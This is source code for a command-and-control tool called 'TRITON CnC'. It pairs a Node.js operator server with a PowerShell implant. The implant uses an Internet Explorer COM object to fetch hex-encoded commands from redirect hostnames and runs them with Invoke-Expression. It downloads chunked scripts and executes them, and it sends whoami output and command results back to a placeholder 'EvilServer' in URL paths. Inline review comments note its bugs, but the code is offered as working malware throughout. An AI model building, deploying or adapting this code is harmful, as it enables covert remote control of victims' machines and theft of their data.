TRITON CnC
var http = require('http');
var readline = require('readline');
var fs = require('fs');
// Operator-entered command waiting to be delivered. 'Nocmd' is the idle
// sentinel; the client side below tests for it with `$command -Like 'Nocmd'`.
var command = 'Nocmd';
// Plain HTTP on this port, no TLS and no authentication of the peer: any
// host that can reach the port can fetch the pending command or append
// arbitrary text to log.txt (see the final branch of handleRequest).
const PORT=8000;
// Requests handled so far; only compared against 0 to spot the first one.
var count = 0;
// Bytes of the file named by the last 'Invoke-Script <path>' command.
var filebuf;
// Bytes per '/getchunk' reply; each chunk is hex-encoded into a hostname.
const split = 20;
// Whole chunks and leftover bytes of filebuf, recomputed per Invoke-Script.
var remainder;
var repeat;
// NOTE(review): declared but never assigned or read. handleRequest writes an
// implicit global named `length` instead, which is presumably what this was
// meant to be; in strict mode that assignment would throw a ReferenceError.
var filelength;
// Index of the next chunk of filebuf to hand out on '/getchunk'.
var chunkcount= 0;
// Set to 1 while a file transfer is pending and 0 otherwise; it is written
// in handleRequest but never read anywhere in this file.
var filecmd = 0;
// Append-only log of the URLs the client reports results in.
var log = fs.createWriteStream('log.txt', {'flags': 'a'});
/**
 * HTTP handler for the command channel.
 *
 * Every response is a 302 whose Location host carries the payload: the
 * pending command (or a 20-byte file chunk) is hex-encoded and placed in
 * front of a fake '.c' top-level domain, e.g. http://4e6f636d64.c/ for
 * 'Nocmd'. The client reads the redirect target back out of its browser
 * object rather than following it. Nothing is encrypted or signed; anyone
 * who can observe or answer this traffic can read and replace commands, and
 * a browser that does follow the redirect will presumably also try to
 * resolve the hex name, so the command text may show up in DNS queries.
 *
 * Routes:
 *   '/'          poll for a command (delivered once, then reset to 'Nocmd')
 *   '/getchunk'  next chunk of the file announced by 'chunk-<n>'
 *   anything else  treated as client output and logged
 *
 * @param {import('http').IncomingMessage} request
 * @param {import('http').ServerResponse} response
 */
function handleRequest(request, response){
// Only the very first request ever changes the prompt; count is never reset.
if (count == 0) {
console.log('\r\nrecieved Connection from : ' + request.connection.remoteAddress + '\r\n');
rl.setPrompt('CnC-'+request.connection.remoteAddress+' > ');
}
count = count +1;
if (request.url == '/') {
// Any command containing 'Invoke-Script' is a file transfer request; the
// reply announces the chunk count instead of the command text.
if (command.indexOf('Invoke-Script') > -1) {
filecmd = 1;
chunkcount = 0;
// Path is the second space-separated token, so paths with spaces truncate.
var file = command.split(' ')[1];
// NOTE(review): readFileSync throws on a missing or unreadable path and
// nothing here catches it; with no error handling the exception propagates
// out of the request handler.
filebuf = fs.readFileSync(file);
// NOTE(review): `length`, `buf` and `cmd` below are assigned without a
// declaration and so become implicit globals (the file declares `filelength`
// but never uses it).
length = filebuf.length;
repeat = Math.floor(length/split);
remainder = length % split;
var total;
// Round up: a partial trailing chunk still counts as one.
if(remainder) {
total = repeat + 1;
}
else {
total = repeat;
}
// `new Buffer(...)` is the legacy constructor; Buffer.from is its replacement.
buf = new Buffer('chunk-'+total);
}
else {
buf = new Buffer(command, 'utf8');
}
cmd = buf.toString('hex');
// The Server header impersonates an Apache stack; the Location host is the
// hex payload. Content-Length is 0 and the body is empty.
response.writeHead(302,'Found',{Location: 'http://'+cmd+'.c/',
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Server': 'Apache/2.4.18 (Debian) mod_python/3.3.1 Python/2.7.11+ OpenSSL/1.0.2g mod_perl/2.0.9 Perl/v5.22.1',
}
);
response.end();
// Each command is handed out exactly once, to whichever peer polls first.
command = 'Nocmd';
}
else if (request.url == '/getchunk'){
// NOTE(review): if no Invoke-Script has been issued yet filebuf is undefined
// and .slice throws; a slice past the end yields an empty buffer, i.e. an
// empty hostname ('http://.c/'). Neither case is checked.
buf = filebuf.slice(chunkcount*split,chunkcount*split+split);
cmd = buf.toString('hex');
console.log(cmd);
chunkcount = chunkcount + 1;
response.writeHead(302,'Found',{Location: 'http://'+cmd+'.c/',
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Server': 'Apache/2.4.18 (Debian) mod_python/3.3.1 Python/2.7.11+ OpenSSL/1.0.2g mod_perl/2.0.9 Perl/v5.22.1',
}
);
response.end();
command = 'Nocmd';
}
else {
// Result upload: the client puts '<whoami>-<output slice>' in the URL path.
// Here 'Nocmd' is sent literally, not hex-encoded, unlike the '/' route.
filecmd = 0;
response.writeHead(302,'Found',{Location: 'http://Nocmd.c/',
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Server': 'Apache/2.4.18 (Debian) mod_python/3.3.1 Python/2.7.11+ OpenSSL/1.0.2g mod_perl/2.0.9 Perl/v5.22.1',
}
);
response.end();
// NOTE(review): decodeURI throws a URIError on malformed percent-encoding
// (uncaught here), and the decoded, attacker-controlled text is written to
// the terminal unfiltered, so terminal escape sequences pass straight through.
log.write('\r\n'+decodeURI(request.url)+'\r\n');
console.log('\r\n'+decodeURI(request.url)+'\r\n');
}
}
// Plain HTTP listener on PORT backed by handleRequest. The listen callback
// deliberately prints nothing: the start-up banner was left disabled.
const server = http.createServer(handleRequest);
server.listen(PORT, () => {
  // Server is up; banner intentionally left disabled.
  // console.log("Server listening on: http://localhost:%s", PORT);
});
// Operator console. Every line typed becomes the pending `command` that the
// next poll of '/' delivers; typing "quit" closes the interface, and the
// 'close' handler flushes the log and terminates the process.
const rl = readline.createInterface(process.stdin, process.stdout);
rl.setPrompt('CnC> ');
rl.prompt();

// One typed line. There is no `return` after close(), so the assignment and
// prompt below still execute after "quit" unless close() has already
// triggered the 'close' handler (which exits the process).
function onOperatorLine(line) {
  if (line === "quit") {
    rl.close();
  }
  command = line;
  rl.prompt();
}

// Flush the log file and stop the server process.
function onOperatorClose() {
  log.end('end');
  process.exit(0);
}

rl.on('line', onOperatorLine);
rl.on('close', onOperatorClose);
# Client side. All traffic goes through an Internet Explorer COM object,
# presumably so the requests originate from a browser process rather than
# from PowerShell itself.
$IE=new-object -com internetexplorer.application;
# NOTE(review): this statement only reads the Silent property; it never
# assigns it, so IE dialogs are not actually suppressed by this line.
$IE.Silent;
# Base URL of the server above. "EvilServer" is a placeholder; the paths
# 'getchunk' and '<whoami>-<output>' are appended to it directly.
$url = "EvilServer";
# Identity prefix sent with every result URL: the output of whoami.
$w = IEX whoami;
# Execute $command with Invoke-Expression (stderr merged into stdout) and
# send the output to the server by navigating IE to
#   $url + <whoami> + '-' + <slice of output>
# one navigation per 1500-character slice, one second apart. The server logs
# each request path; nothing is sent back for the output itself.
function ExecCommand($command) {
# Whatever the server delivered is executed verbatim: there is no signature,
# allow-list or origin check, so anyone who can answer the poll runs code
# here with this process's privileges.
$string = IEX $command 2>&1 | out-string;
write-host $string;
$len = $string.Length;
$split = 1500;
$repeat=[Math]::Floor($len/$split);
# Full 1500-character slices. The slice is concatenated into the URL without
# any encoding; how IE handles spaces or newlines in it is not handled here.
for($i=0;$i-lt$repeat;$i++){
$str = $string.Substring($i*$Split,$Split);
$IE.navigate($url+$w+'-'+$str);
Start-Sleep -s 1;
};
# Trailing partial slice: assigns the remainder and tests it for non-zero.
# An output whose length is an exact multiple of 1500 (including empty
# output) therefore sends nothing here, so the server sees no request at all
# for a command that produced no output.
if($remainder=$len%$split){
$str = $string.Substring($len-$remainder);
$IE.navigate($url+$w+'-'+$str);
};
}
# Decode the hex payload carried in a redirect hostname.
# The server answers with a target such as "4e6f636d64.c"; everything before
# the first '.' is a hex string (two characters per byte) which is turned
# back into text here. Nothing is validated: non-hex input makes
# [int]::Parse throw, and an odd-length string fails on the last pair.
function decodeCommand($command) {
    # Keep the label in front of the first '.', dropping the fake TLD.
    $hex = ($command -Split '\.')[0];
    # Walk the label two characters at a time, one char per hex pair.
    $chars = for ($pos = 0; $pos -lt $hex.Length; $pos += 2) {
        [char][int]::Parse($hex.Substring($pos, 2), 'HexNumber')
    };
    return ($chars -join '');
}
# Poll loop: fetch the next command from the server, decode it from the
# redirect hostname and act on it. Runs until the process is killed.
while ($true) {
$IE.navigate($url);
# NOTE(review): navigate() is not awaited and ReadyState is never checked,
# so the URL read here may still belong to the previous navigation; the
# sleeps below appear to be what keeps this loosely in step — confirm.
# The redirect target 'http://<hex>.c/' splits on '/' into
# ('http:', '', '<hex>.c', ...), hence index 2.
$command = $IE.Document.url -Split '/';
$command = $command[2];
$command = decodeCommand($command);
write-host $command;
# Idle sentinel from the server: wait and poll again.
if($command -Like'Nocmd') {
Start-Sleep -s 2;
continue;
}
# File transfer announced as 'chunk-<n>': pull n chunks from /getchunk,
# concatenate the decoded pieces and execute the result as a script.
elseif($command -like'chunk*'){
$c ='';
$command = $command -split '-';
$cnt = $command[1];
# One request is issued before the loop and one more per iteration, so
# n+1 /getchunk requests are made for n chunks; each read presumably sees
# the previous navigation's redirect (see the note above), and the last
# request's response — past the end of the server's buffer — is never read.
$IE.navigate($url+'getchunk');
for($i=0;$i -lt $cnt; $i++) {
Start-Sleep -s 1;
$IE.navigate($url+'getchunk');
$cmd = $IE.Document.url -Split '/';
$cmd = $cmd[2];
write-host $cmd;
$cmd = decodeCommand($cmd);
write-host $cmd;
$c = $c + $cmd
}
write-host $c;
ExecCommand($c);
}
# Anything else is a command line to run as-is.
else {
write-host 'Exec';
ExecCommand($command);
Start-Sleep -s 2;
}
}